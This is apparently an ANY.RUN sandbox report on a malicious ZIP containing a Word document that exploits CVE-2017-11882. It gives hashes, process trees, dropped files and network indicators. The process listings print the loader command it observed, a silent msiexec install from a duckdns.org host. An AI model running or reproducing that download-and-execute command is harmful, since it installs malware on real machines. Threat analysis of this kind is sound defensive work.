analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Statement.zip

Full analysis: https://app.any.run/tasks/6acf3f02-b380-480e-8632-72ef7a414f60
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: September 11, 2019, 07:38:12
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exploit
CVE-2017-11882
exe-to-msi
loader
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

221EC6F5900A196467A969F2781196EE

SHA1:

B41DCA75F5AF758D82907A60E0560D44AA1F57DD

SHA256:

42F650E4FA0CC68EC81FC7BBF1FFB509934666A31A42D554348F901F5340C8F5

SSDEEP:

192:MHrFMg+G8ydcQxbdEmVcEfY1sukTgFjVckb745n:aus8ydfxbqmjYmbTgFOkbg

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 1804)
      • EQNEDT32.EXE (PID: 1008)
    • Uses Microsoft Installer as loader

      • cmd.exe (PID: 2740)
      • cmd.exe (PID: 2788)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 3032)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 3032)
    • Starts Microsoft Office Application

      • WinRAR.exe (PID: 2748)
    • Drop ExeToMSI Application

      • msiexec.exe (PID: 3032)
    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 1804)
      • EQNEDT32.EXE (PID: 1008)
    • Executed via COM

      • EQNEDT32.EXE (PID: 3028)
      • EQNEDT32.EXE (PID: 1008)
      • EQNEDT32.EXE (PID: 1804)
  • INFO

    • Application was dropped or rewritten from another process

      • MSI1D7.tmp (PID: 2396)
      • MSI1D7.tmp (PID: 3404)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3944)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3944)
    • Application was crashed

      • EQNEDT32.EXE (PID: 1804)
      • EQNEDT32.EXE (PID: 1008)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 3032)
      • MSI1D7.tmp (PID: 2396)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 3032)
    • Application launched itself

      • MSI1D7.tmp (PID: 2396)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: Statement.doc
ZipUncompressedSize: 231187
ZipCompressedSize: 8801
ZipCRC: 0x155b0b72
ZipModifyDate: 2019:09:10 15:05:15
ZipCompression: Deflated
ZipBitFlag: -
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
49
Monitored processes
12
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start winrar.exe no specs winword.exe no specs eqnedt32.exe cmd.exe no specs msiexec.exe no specs msiexec.exe eqnedt32.exe no specs eqnedt32.exe cmd.exe no specs msiexec.exe no specs msi1d7.tmp no specs msi1d7.tmp no specs

Process information

PID
CMD
Path
Indicators
Parent process
2748"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Statement.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
3944"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIa2748.1767\Statement.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1008"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
2788cmd.exe & /C CD C: & msiexec.exe /i http://ddownstairs.duckdns.org/downstairs/files.msi /qn C:\Windows\system32\cmd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3236msiexec.exe /i http://ddownstairs.duckdns.org/downstairs/files.msi /qn C:\Windows\system32\msiexec.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3032C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3028"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEsvchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
1804"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
2740cmd.exe & /C CD C: & msiexec.exe /i http://ddownstairs.duckdns.org/downstairs/files.msi /qn C:\Windows\system32\cmd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1618
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3860msiexec.exe /i http://ddownstairs.duckdns.org/downstairs/files.msi /qn C:\Windows\system32\msiexec.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
1618
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Total events
1 892
Read events
1 360
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
10
Unknown types
5

Dropped files

PID
Process
Filename
Type
3944WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRBCEC.tmp.cvr
MD5:
SHA256:
3032msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF1D337D9036796025.TMP
MD5:
SHA256:
3032msiexec.exeC:\Config.Msi\17009e.rbs
MD5:
SHA256:
3032msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF5AAF18336F709554.TMP
MD5:
SHA256:
3944WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Rar$DIa2748.1767\~$atement.docpgc
MD5:545813682C9D7E7E5BB1541759DB4228
SHA256:1ED35A89F49A314187C4A0F115906A7B8E54A527BA07BA953E5448F52807AA40
3032msiexec.exeC:\Windows\Installer\MSI10A.tmpbinary
MD5:E8F7C3245B2A78769BA48D7C92C89208
SHA256:DC3A5D78C28C47EBB2009DCE239B690C32BF8AEA9FD4DD975030EBA5566BE42E
3032msiexec.exeC:\Windows\Installer\17009d.ipibinary
MD5:D3C8D8EE948AE03B74EFD26515DDBF79
SHA256:DF8F1BD7E7884E17D88152222978B1C5CF254BA4A8ABD6EC3B51670CD4FE1D50
3032msiexec.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.datdat
MD5:235097C50798BED4D5ECD21DC3C3280E
SHA256:410D4327BE8276595F0668082E953E6962FACB28F9291A42812D3ADBEAF4983D
3032msiexec.exeC:\Windows\Installer\MSIC77B.tmpexecutable
MD5:E05F725943DD94C9BC70F9F543C83CC0
SHA256:36F8E9A235C877B6A90E97368C61C3CFAEED7CEFFF6F17FB11A3DAD14B865D64
3944WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:6FB1F4515E006CA3B99B9F608EBE2094
SHA256:748E7A6492883FE4DBB31008488345DEA81C049AB6C6B877A4E1C5B3ED1B5599
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3032
msiexec.exe
GET
200
216.170.114.206:80
http://ddownstairs.duckdns.org/downstairs/files.msi
US
executable
444 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3032
msiexec.exe
216.170.114.206:80
ddownstairs.duckdns.org
ColoCrossing
US
malicious

DNS requests

Domain
IP
Reputation
ddownstairs.duckdns.org
  • 216.170.114.206
malicious

Threats

PID
Process
Class
Message
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
3032
msiexec.exe
Potential Corporate Privacy Violation
SUSPICIOUS [PTsecurity] Executable application_x-msi Download
3032
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
3032
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable ExeToMSI Download
1 ETPRO signatures available at the full report
No debug info